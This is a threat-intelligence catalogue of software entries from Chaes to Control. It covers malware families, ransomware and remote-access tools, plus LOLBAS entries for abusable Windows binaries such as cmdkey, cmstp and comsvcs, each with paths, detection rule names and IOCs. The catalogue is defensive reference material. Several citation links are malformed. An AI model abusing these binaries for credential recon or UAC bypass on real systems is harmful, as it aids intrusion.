[Chaes](https://app.tidalcyber.com/software/0c8efcd0-bfdf-4771-8754-18aac836c359) is a multistage information stealer written in several programming languages that collects login credentials, credit card numbers, and other financial information. [Chaes](https://app.tidalcyber.com/software/0c8efcd0-bfdf-4771-8754-18aac836c359) was first observed in 2020, and appears to primarily target victims in Brazil as well as other e-commerce customers in Latin America.<sup>[[Cybereason Chaes Nov 2020](https://app.tidalcyber.com/references/aaefa162-82a8-4b6d-b7be-fd31fafd9246)]</sup>

The tag is: misp-galaxy:software="Chaes"

Chaos

[Chaos](https://app.tidalcyber.com/software/92c88765-6b12-42cd-b1d7-f6a65b2236e2) is Linux malware that compromises systems by brute force attacks against SSH services. Once installed, it provides a reverse shell to its controllers, triggered by unsolicited packets. <sup>[[Chaos Stolen Backdoor](https://app.tidalcyber.com/references/8e6916c1-f102-4b54-b6a5-a58fed825c2e)]</sup>

The tag is: misp-galaxy:software="Chaos"

CharmPower

[CharmPower](https://app.tidalcyber.com/software/b1e3b56f-2e83-4cab-a1c1-16999009d056) is a PowerShell-based, modular backdoor that has been used by [Magic Hound](https://app.tidalcyber.com/groups/7a9d653c-8812-4b96-81d1-b0a27ca918b4) since at least 2022.<sup>[[Check Point APT35 CharmPower January 2022](https://app.tidalcyber.com/references/81dce660-93ea-42a4-902f-0c6021d30f59)]</sup>

The tag is: misp-galaxy:software="CharmPower"

HAYMAKER - Associated Software

Based on similarities in reported malware behavior and open source reporting, it is assessed that the malware named HAYMAKER by FireEye is likely the same as the malware ChChes. <sup>[[FireEye APT10 April 2017](https://app.tidalcyber.com/references/2d494df8-83e3-45d2-b798-4c3bcf55f675)]</sup> <sup>[[Twitter Nick Carr APT10](https://app.tidalcyber.com/references/0f133f2c-3b02-4b3b-a960-ef6a7862cf8f)]</sup>

The tag is: misp-galaxy:software="HAYMAKER - Associated Software"

Scorpion - Associated Software

<sup>[[PWC Cloud Hopper Technical Annex April 2017](https://app.tidalcyber.com/references/da6c8a72-c732-44d5-81ac-427898706eed)]</sup>

The tag is: misp-galaxy:software="Scorpion - Associated Software"

ChChes

[ChChes](https://app.tidalcyber.com/software/3f2283ef-67c2-49a3-98ac-1aa9f0499361) is a Trojan that appears to be used exclusively by [menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322). It was used to target Japanese organizations in 2016. Its lack of persistence methods suggests it may be intended as a first-stage tool. <sup>[[Palo Alto menuPass Feb 2017](https://app.tidalcyber.com/references/ba4f7d65-73ec-4726-b1f6-f2443ffda5e7)]</sup> <sup>[[JPCERT ChChes Feb 2017](https://app.tidalcyber.com/references/657b43aa-ead2-41d3-911a-d714d9b28e19)]</sup> <sup>[[PWC Cloud Hopper Technical Annex April 2017](https://app.tidalcyber.com/references/da6c8a72-c732-44d5-81ac-427898706eed)]</sup>

The tag is: misp-galaxy:software="ChChes"

Cherry Picker

[Cherry Picker](https://app.tidalcyber.com/software/2fd6f564-918e-4ee7-920a-2b4be858d11a) is a point of sale (PoS) memory scraper. <sup>[[Trustwave Cherry Picker](https://app.tidalcyber.com/references/e09f639e-bdd3-4e88-8032-f665e347272b)]</sup>

The tag is: misp-galaxy:software="Cherry Picker"

China Chopper

[China Chopper](https://app.tidalcyber.com/software/723c5ab7-23ca-46f2-83bb-f1d1e550122c) is a [Web Shell](https://app.tidalcyber.com/technique/05a5318f-476d-44c1-8a85-9466295d31dd) hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server.<sup>[[Lee 2013](https://app.tidalcyber.com/references/6d1e2b0a-fed2-490b-be25-6580dfb7d6aa)]</sup> It has been used by several threat groups.<sup>[[Dell TG-3390](https://app.tidalcyber.com/references/dfd2d832-a6c5-40e7-a554-5a92f05bebae)]</sup><sup>[[FireEye Periscope March 2018](https://app.tidalcyber.com/references/8edb5d2b-b5c4-4d9d-8049-43dd6ca9ab7f)]</sup><sup>[[CISA AA21-200A APT40 July 2021](https://app.tidalcyber.com/references/3a2dbd8b-54e3-406a-b77c-b6fae5541b6d)]</sup><sup>[[Rapid7 HAFNIUM Mar 2021](https://app.tidalcyber.com/references/cf05d229-c2ba-54f2-a79d-4b7c9185c663)]</sup>

The tag is: misp-galaxy:software="China Chopper"

Chinoxy

[Chinoxy](https://app.tidalcyber.com/software/7c36563a-9143-4766-8aef-4e1787e18d8c) is a backdoor that has been used since at least November 2018, during the [FunnyDream](https://app.tidalcyber.com/campaigns/94587edf-0292-445b-8c66-b16629597f1e) campaign, to gain persistence and drop additional payloads. According to security researchers, [Chinoxy](https://app.tidalcyber.com/software/7c36563a-9143-4766-8aef-4e1787e18d8c) has been used by Chinese-speaking threat actors.<sup>[[Bitdefender FunnyDream Campaign November 2020](https://app.tidalcyber.com/references/b62a9f2c-02ca-4dfa-95fc-5dc6ad9568de)]</sup>

The tag is: misp-galaxy:software="Chinoxy"

Chisel

Chisel is an open source tool that can be used for networking tunneling.<sup>[[U.S. CISA AvosLocker October 11 2023](/references/d419a317-6599-4fc5-91d1-a4c2bc83bf6a)]</sup> According to its GitHub project page, "Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH".<sup>[[GitHub Chisel](/references/4a60fb46-06b7-44ea-a9f6-8d6fa81e9363)]</sup> Threat actors including ransomware operators and nation-state-aligned espionage actors have used Chisel as part of their operations.<sup>[[U.S. CISA AvosLocker October 11 2023](/references/d419a317-6599-4fc5-91d1-a4c2bc83bf6a)]</sup><sup>[[CISA AA20-259A Iran-Based Actor September 2020](/references/1bbc9446-9214-4fcd-bc7c-bf528370b4f8)]</sup>

The tag is: misp-galaxy:software="Chisel"

Chocolatey

Chocolatey is a command-line package manager for Microsoft Windows.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="Chocolatey"

Backdoor.SofacyX - Associated Software

The tag is: misp-galaxy:software="Backdoor.SofacyX - Associated Software"

SPLM - Associated Software

The tag is: misp-galaxy:software="SPLM - Associated Software"

Xagent - Associated Software

The tag is: misp-galaxy:software="Xagent - Associated Software"

X-Agent - Associated Software

The tag is: misp-galaxy:software="X-Agent - Associated Software"

webhp - Associated Software

The tag is: misp-galaxy:software="webhp - Associated Software"

CHOPSTICK

[CHOPSTICK](https://app.tidalcyber.com/software/01c6c49a-f7c8-44cd-a377-4dfd358ffeba) is a malware family of modular backdoors used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5). It has been used since at least 2012 and is usually dropped on victims as second-stage malware, though it has been used as first-stage malware in several cases. It has both Windows and Linux variants. <sup>[[FireEye APT28](https://app.tidalcyber.com/references/c423b2b2-25a3-4a8d-b89a-83ab07c0cd20)]</sup> <sup>[[ESET Sednit Part 2](https://app.tidalcyber.com/references/aefb9eda-df5a-437f-af2a-ec1b6c04628b)]</sup> <sup>[[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)]</sup> <sup>[[DOJ GRU Indictment Jul 2018](https://app.tidalcyber.com/references/d65f371b-19d0-49de-b92b-94a2bea1d988)]</sup> It is tracked separately from the [X-Agent for Android](https://app.tidalcyber.com/software/).

The tag is: misp-galaxy:software="CHOPSTICK"

Chrommme

[Chrommme](https://app.tidalcyber.com/software/df77ed2a-f135-4f00-9a5e-79b7a6a2ed14) is a backdoor tool written using the Microsoft Foundation Class (MFC) framework that was first reported in June 2021; security researchers noted infrastructure overlaps with [Gelsemium](https://app.tidalcyber.com/software/9a117508-1d22-4fea-aa65-db670c13a5c9) malware.<sup>[[ESET Gelsemium June 2021](https://app.tidalcyber.com/references/ea28cf8c-8c92-48cb-b499-ffb7ff0e3cf5)]</sup>

The tag is: misp-galaxy:software="Chrommme"

Clambling

[Clambling](https://app.tidalcyber.com/software/4bac93bd-7e58-4ddb-a205-d99597b9e65e) is a modular backdoor written in C++ that has been used by [Threat Group-3390](https://app.tidalcyber.com/groups/79be2f31-5626-425e-844c-fd9c99e38fe5) since at least 2017.<sup>[[Trend Micro DRBControl February 2020](https://app.tidalcyber.com/references/4dfbf26d-023b-41dd-82c8-12fe18cb10e6)]</sup>

The tag is: misp-galaxy:software="Clambling"

CL_Invocation.ps1 - Associated Software

<sup>[[CL_Invocation.ps1 - LOLBAS Project](/references/a53e093a-973c-491d-91e3-bc7804d87b8b)]</sup>

The tag is: misp-galaxy:software="CL_Invocation.ps1 - Associated Software"

CL_Invocation

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Aero diagnostics script

Author: Oddvar Moe

Paths: * C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 * C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 * C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1

Resources:

Detection: * Sigma: [proc_creation_win_lolbin_cl_invocation.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_cl_invocation.yml) * Sigma: [posh_ps_cl_invocation_lolscript.yml]([CL_Invocation.ps1 - LOLBAS Project(/references/a53e093a-973c-491d-91e3-bc7804d87b8b)]</sup>

The tag is: misp-galaxy:software="CL_Invocation"

CL_LoadAssembly.ps1 - Associated Software

<sup>[[CL_LoadAssembly.ps1 - LOLBAS Project](/references/31a14027-1181-49b9-87bf-78a65a551312)]</sup>

The tag is: misp-galaxy:software="CL_LoadAssembly.ps1 - Associated Software"

CL_LoadAssembly

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: PowerShell Diagnostic Script

Author: Jimmy (@bohops)

Paths: * C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1

Detection: * Sigma: [proc_creation_win_lolbas_cl_loadassembly.yml]([CL_LoadAssembly.ps1 - LOLBAS Project(/references/31a14027-1181-49b9-87bf-78a65a551312)]</sup>

The tag is: misp-galaxy:software="CL_LoadAssembly"

CL_Mutexverifiers.ps1 - Associated Software

<sup>[[CL_Mutexverifiers.ps1 - LOLBAS Project](/references/75b89502-21ed-4920-95cc-212eaf17f281)]</sup>

The tag is: misp-galaxy:software="CL_Mutexverifiers.ps1 - Associated Software"

CL_Mutexverifiers

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Proxy execution with CL_Mutexverifiers.ps1

Author: Oddvar Moe

Paths: * C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 * C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 * C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 * C:\Windows\diagnostics\system\Video\CL_Mutexverifiers.ps1 * C:\Windows\diagnostics\system\Speech\CL_Mutexverifiers.ps1

Detection: * Sigma: [proc_creation_win_lolbin_cl_mutexverifiers.yml]([CL_Mutexverifiers.ps1 - LOLBAS Project(/references/75b89502-21ed-4920-95cc-212eaf17f281)]</sup>

The tag is: misp-galaxy:software="CL_Mutexverifiers"

Clop

[Clop](https://app.tidalcyber.com/software/5321aa75-924c-47ae-b97a-b36f023abf2a) is a ransomware family that was first observed in February 2019 and has been used against retail, transportation and logistics, education, manufacturing, engineering, automotive, energy, financial, aerospace, telecommunications, professional and legal services, healthcare, and high tech industries. [Clop](https://app.tidalcyber.com/software/5321aa75-924c-47ae-b97a-b36f023abf2a) is a variant of the CryptoMix ransomware.<sup>[[Mcafee Clop Aug 2019](https://app.tidalcyber.com/references/458141bd-7dd2-41fd-82e8-7ea2e4a477ab)]</sup><sup>[[Cybereason Clop Dec 2020](https://app.tidalcyber.com/references/f54d682d-100e-41bb-96be-6a79ea422066)]</sup><sup>[[Unit42 Clop April 2021](https://app.tidalcyber.com/references/ce48d631-757c-480b-8572-b7d9f4d738c6)]</sup>

The tag is: misp-galaxy:software="Clop"

MiniDionis - Associated Software

The tag is: misp-galaxy:software="MiniDionis - Associated Software"

CloudLook - Associated Software

The tag is: misp-galaxy:software="CloudLook - Associated Software"

cmd.exe - Associated Software

The tag is: misp-galaxy:software="cmd.exe - Associated Software"

cmd

[cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) is the Windows command-line interpreter that can be used to interact with systems and execute other processes and utilities. <sup>[[TechNet Cmd](https://app.tidalcyber.com/references/dbfc01fe-c300-4c27-ab9a-a20508c1e04b)]</sup>

Cmd.exe contains native functionality to perform many operations to interact with the system, including listing files in a directory (e.g., <code>dir</code> <sup>[[TechNet Dir](https://app.tidalcyber.com/references/f1eb8631-6bea-4688-a5ff-a388b1fdceb0)]</sup>), deleting files (e.g., <code>del</code> <sup>[[TechNet Del](https://app.tidalcyber.com/references/01fc44b9-0eb3-4fd2-b755-d611825374ae)]</sup>), and copying files (e.g., <code>copy</code> <sup>[[TechNet Copy](https://app.tidalcyber.com/references/4e0d4b94-6b4c-4104-86e6-499b6aa7ba78)]</sup>).

The tag is: misp-galaxy:software="cmd"

Cmdkey.exe - Associated Software

<sup>[[Cmdkey.exe - LOLBAS Project](/references/c9ca075a-8327-463d-96ec-adddf6f1a7bb)]</sup>

The tag is: misp-galaxy:software="Cmdkey.exe - Associated Software"

Cmdkey

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: creates, lists, and deletes stored user names and passwords or credentials.

Author: Oddvar Moe

Paths: * C:\Windows\System32\cmdkey.exe * C:\Windows\SysWOW64\cmdkey.exe

Detection: * Sigma: [proc_creation_win_cmdkey_recon.yml]([Cmdkey.exe - LOLBAS Project(/references/c9ca075a-8327-463d-96ec-adddf6f1a7bb)]</sup>

The tag is: misp-galaxy:software="Cmdkey"

cmdl32.exe - Associated Software

<sup>[[cmdl32.exe - LOLBAS Project](/references/2628e452-caa1-4058-a405-7c4657fa3245)]</sup>

The tag is: misp-galaxy:software="cmdl32.exe - Associated Software"

cmdl32

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft Connection Manager Auto-Download

Author: Elliot Killick

Paths: * C:\Windows\System32\cmdl32.exe * C:\Windows\SysWOW64\cmdl32.exe

Detection: * Sigma: [proc_creation_win_lolbin_cmdl32.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_cmdl32.yml) * IOC: Reports of downloading from suspicious URLs in %TMP%\config.log * IOC: Useragent Microsoft® Connection Manager Vpn File Update<sup>[[cmdl32.exe - LOLBAS Project](/references/2628e452-caa1-4058-a405-7c4657fa3245)]</sup>

The tag is: misp-galaxy:software="cmdl32"

Cmstp.exe - Associated Software

<sup>[[Cmstp.exe - LOLBAS Project](/references/86c21dcd-464a-4870-8aae-25fcaccc889d)]</sup>

The tag is: misp-galaxy:software="Cmstp.exe - Associated Software"

Cmstp

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Installs or removes a Connection Manager service profile.

Author: Oddvar Moe

Paths: * C:\Windows\System32\cmstp.exe * C:\Windows\SysWOW64\cmstp.exe

Detection: * Sigma: [proc_creation_win_cmstp_execution_by_creation.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml) * Sigma: [proc_creation_win_uac_bypass_cmstp.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml) * Splunk: [cmlua_or_cmstplua_uac_bypass.yml](https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml) * Elastic: [defense_evasion_suspicious_managedcode_host_process.toml](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml) * Elastic: [defense_evasion_unusual_process_network_connection.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml) * IOC: Execution of cmstp.exe without a VPN use case is suspicious * IOC: DotNet CLR libraries loaded into cmstp.exe * IOC: DotNet CLR Usage Log - cmstp.exe.log<sup>[[Cmstp.exe - LOLBAS Project](/references/86c21dcd-464a-4870-8aae-25fcaccc889d)]</sup>

The tag is: misp-galaxy:software="Cmstp"

Cobalt Strike

[Cobalt Strike](https://app.tidalcyber.com/software/9b6bcbba-3ab4-4a4c-a233-cd12254823f6) is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.<sup>[[cobaltstrike manual](https://app.tidalcyber.com/references/43277d05-0aa4-4cee-ac41-6f03a49851a9)]</sup>

In addition to its own capabilities, [Cobalt Strike](https://app.tidalcyber.com/software/9b6bcbba-3ab4-4a4c-a233-cd12254823f6) leverages the capabilities of other well-known tools such as Metasploit and [Mimikatz]([cobaltstrike manual(https://app.tidalcyber.com/references/43277d05-0aa4-4cee-ac41-6f03a49851a9)]</sup>

The tag is: misp-galaxy:software="Cobalt Strike"

Cobalt Strike Random C2 Profile Generator

This is an open-source tool for creating Cobalt Strike Malleable C2 profiles with randomly generated variables.<sup>[[GitHub random_c2_profile](/references/dcb30328-6aa4-461b-8333-451d6af4b384)]</sup> According to a September 2023 CERT-FR advisory, during an intrusion in March 2023, actors attributed to FIN12 used the tool to generate a Cobalt Strike malleable C2 profile.<sup>[[CERTFR-2023-CTI-007](/references/0f4a03c5-79b3-418e-a77d-305d5a32caca)]</sup>

The tag is: misp-galaxy:software="Cobalt Strike Random C2 Profile Generator"

Cobian RAT

[Cobian RAT](https://app.tidalcyber.com/software/d4e6f9f7-7f4d-47c2-be24-b267d9317303) is a backdoor, remote access tool that has been observed since 2016.<sup>[[Zscaler Cobian Aug 2017](https://app.tidalcyber.com/references/46541bb9-15cb-4a7c-a624-48a1c7e838e3)]</sup>

The tag is: misp-galaxy:software="Cobian RAT"

code.exe - Associated Software

<sup>[[code.exe - LOLBAS Project](/references/4a93063b-f3a3-4726-870d-b8f744651363)]</sup>

The tag is: misp-galaxy:software="code.exe - Associated Software"

code

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: VSCode binary, also portable (CLI) version

Author: PfiatDe

Paths: * %LOCALAPPDATA%\Programs\Microsoft VS Code\Code.exe * C:\Program Files\Microsoft VS Code\Code.exe * C:\Program Files (x86)\Microsoft VS Code\Code.exe

Detection: * IOC: Websocket traffic to global.rel.tunnels.api.visualstudio.com * IOC: Process tree: code.exe → cmd.exe → node.exe → winpty-agent.exe * IOC: File write of code_tunnel.json which is parametizable, but defaults to: %UserProfile%\.vscode-cli\code_tunnel.json<sup>[[code.exe - LOLBAS Project](/references/4a93063b-f3a3-4726-870d-b8f744651363)]</sup>

The tag is: misp-galaxy:software="code"

CoinTicker

[CoinTicker](https://app.tidalcyber.com/software/b0d9b31a-072b-4744-8d2f-3a63256a932f) is a malicious application that poses as a cryptocurrency price ticker and installs components of the open source backdoors EvilOSX and EggShell.<sup>[[CoinTicker 2019](https://app.tidalcyber.com/references/99c53143-6f93-44c9-a874-c1b9e4506fb4)]</sup>

The tag is: misp-galaxy:software="CoinTicker"

Colorcpl.exe - Associated Software

<sup>[[Colorcpl.exe - LOLBAS Project](/references/53ff662d-a0b3-41bd-ab9e-a9bb8bbdea25)]</sup>

The tag is: misp-galaxy:software="Colorcpl.exe - Associated Software"

Colorcpl

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary that handles color management

Author: Arjan Onwezen

Paths: * C:\Windows\System32\colorcpl.exe * C:\Windows\SysWOW64\colorcpl.exe

Detection: * Sigma: [file_event_win_susp_colorcpl.yml](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file/file_event/file_event_win_susp_colorcpl.yml) * IOC: colorcpl.exe writing files<sup>[[Colorcpl.exe - LOLBAS Project](/references/53ff662d-a0b3-41bd-ab9e-a9bb8bbdea25)]</sup>

The tag is: misp-galaxy:software="Colorcpl"

Comnie

[Comnie](https://app.tidalcyber.com/software/341fc709-4908-4e41-8df3-554dae6d72b0) is a remote backdoor which has been used in attacks in East Asia. <sup>[[Palo Alto Comnie](https://app.tidalcyber.com/references/ff3cc105-2798-45de-8561-983bf57eb9d9)]</sup>

The tag is: misp-galaxy:software="Comnie"

ComRAT

[ComRAT](https://app.tidalcyber.com/software/300c5997-a486-4a61-8213-93a180c22849) is a second stage implant suspected of being a descendant of [Agent.btz](https://app.tidalcyber.com/software/f27c9a91-c618-40c6-837d-089ba4d80f45) and used by [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2). The first version of [ComRAT](https://app.tidalcyber.com/software/300c5997-a486-4a61-8213-93a180c22849) was identified in 2007, but the tool has undergone substantial development for many years since.<sup>[[Symantec Waterbug](https://app.tidalcyber.com/references/ec02f951-17b8-44cb-945a-e5c313555124)]</sup><sup>[[NorthSec 2015 GData Uroburos Tools](https://app.tidalcyber.com/references/99e2709e-a32a-4fbf-a20a-ffcdd8befdc8)]</sup><sup>[[ESET ComRAT May 2020](https://app.tidalcyber.com/references/cd9043b8-4d14-449b-a6b2-2e9b99103bb0)]</sup>

The tag is: misp-galaxy:software="ComRAT"

Comsvcs.dll - Associated Software

<sup>[[Comsvcs.dll - LOLBAS Project](/references/2eb2756d-5a49-4df3-9e2f-104c41c645cd)]</sup>

The tag is: misp-galaxy:software="Comsvcs.dll - Associated Software"

Comsvcs

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: COM+ Services

Author: LOLBAS Team

Paths: * c:\windows\system32\comsvcs.dll

The tag is: misp-galaxy:software="Comsvcs"

Kido - Associated Software

The tag is: misp-galaxy:software="Kido - Associated Software"

Downadup - Associated Software

The tag is: misp-galaxy:software="Downadup - Associated Software"

Conficker

[Conficker](https://app.tidalcyber.com/software/ef33f1fa-18a3-4b30-b359-17b7930f43a7) is a computer worm first detected in October 2008 that targeted Microsoft Windows using the MS08-067 Windows vulnerability to spread.<sup>[[SANS Conficker](https://app.tidalcyber.com/references/2dca2274-5f25-475a-b87d-97f3e3a525de)]</sup> In 2016, a variant of [Conficker](https://app.tidalcyber.com/software/ef33f1fa-18a3-4b30-b359-17b7930f43a7) made its way on computers and removable disk drives belonging to a nuclear power plant.<sup>[[Conficker Nuclear Power Plant](https://app.tidalcyber.com/references/83b8c3c4-d67a-48bd-8614-1c703a8d969b)]</sup>

The tag is: misp-galaxy:software="Conficker"

ConfigSecurityPolicy.exe - Associated Software

<sup>[[ConfigSecurityPolicy.exe - LOLBAS Project](/references/30b8a5d8-596c-4ab3-b3db-b799cc8923e1)]</sup>

The tag is: misp-galaxy:software="ConfigSecurityPolicy.exe - Associated Software"

ConfigSecurityPolicy

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.

Author: Ialle Teixeira

Paths: * C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe * C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe

Detection: * Sigma: [proc_creation_win_lolbin_configsecuritypolicy.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml) * IOC: ConfigSecurityPolicy storing data into alternate data streams. * IOC: Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS. * IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe. * IOC: User Agent is "MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"<sup>[[ConfigSecurityPolicy.exe - LOLBAS Project](/references/30b8a5d8-596c-4ab3-b3db-b799cc8923e1)]</sup>

The tag is: misp-galaxy:software="ConfigSecurityPolicy"

Conhost.exe - Associated Software

<sup>[[Conhost.exe - LOLBAS Project](/references/5ed807c1-15d1-48aa-b497-8cd74fe5b299)]</sup>

The tag is: misp-galaxy:software="Conhost.exe - Associated Software"

Conhost

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Console Window host

Author: Wietze Beukema

Paths: * c:\windows\system32\conhost.exe

Detection: * IOC: conhost.exe spawning unexpected processes * Sigma: [proc_creation_win_conhost_susp_child_process.yml]([Conhost.exe - LOLBAS Project(/references/5ed807c1-15d1-48aa-b497-8cd74fe5b299)]</sup>

The tag is: misp-galaxy:software="Conhost"

ScreenConnect - Associated Software

<sup>[[Anomali Static Kitten February 2021](https://app.tidalcyber.com/references/710ed789-de1f-4601-a8ba-32147827adcb)]</sup>

The tag is: misp-galaxy:software="ScreenConnect - Associated Software"

ConnectWise

[ConnectWise](https://app.tidalcyber.com/software/6f9bb24d-cce2-49de-bedd-1849d9bde7a0) is a legitimate remote administration tool that has been used since at least 2016 by threat actors including [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6) and [GOLD SOUTHFIELD](https://app.tidalcyber.com/groups/b4d068ac-9b68-4cd8-bf0c-019f910ef8e3) to connect to and conduct lateral movement in target environments.<sup>[[Anomali Static Kitten February 2021](https://app.tidalcyber.com/references/710ed789-de1f-4601-a8ba-32147827adcb)]</sup><sup>[[Trend Micro Muddy Water March 2021](https://app.tidalcyber.com/references/16b4b834-2f44-4bac-b810-f92080c41f09)]</sup>

The tag is: misp-galaxy:software="ConnectWise"

Conti

[Conti](https://app.tidalcyber.com/software/8e995c29-2759-4aeb-9a0f-bb7cd97b06e5) is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. [Conti](https://app.tidalcyber.com/software/8e995c29-2759-4aeb-9a0f-bb7cd97b06e5) has been deployed via [TrickBot](https://app.tidalcyber.com/software/c2bd4213-fc7b-474f-b5a0-28145b07c51d) and used against major corporations and government agencies, particularly those in North America. As with other ransomware families, actors using [Conti](https://app.tidalcyber.com/software/8e995c29-2759-4aeb-9a0f-bb7cd97b06e5) steal sensitive files and information from compromised networks, and threaten to publish this data unless the ransom is paid.<sup>[[Cybereason Conti Jan 2021](https://app.tidalcyber.com/references/3c0e82a2-41ab-4e63-ac10-bd691c786234)]</sup><sup>[[CarbonBlack Conti July 2020](https://app.tidalcyber.com/references/3c3a6dc0-66f2-492e-8c9c-c0bcca73008e)]</sup><sup>[[Cybleinc Conti January 2020](https://app.tidalcyber.com/references/5ef0ad9d-f34d-4771-a595-7ee4994f6c91)]</sup>

The tag is: misp-galaxy:software="Conti"

Control.exe - Associated Software

<sup>[[Control.exe - LOLBAS Project](/references/d0c821b9-7d37-4158-89fa-0dabe6e06800)]</sup>

The tag is: misp-galaxy:software="Control.exe - Associated Software"

Control

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary used to launch controlpanel items in Windows

Author: Oddvar Moe

Paths: * C:\Windows\System32\control.exe * C:\Windows\SysWOW64\control.exe

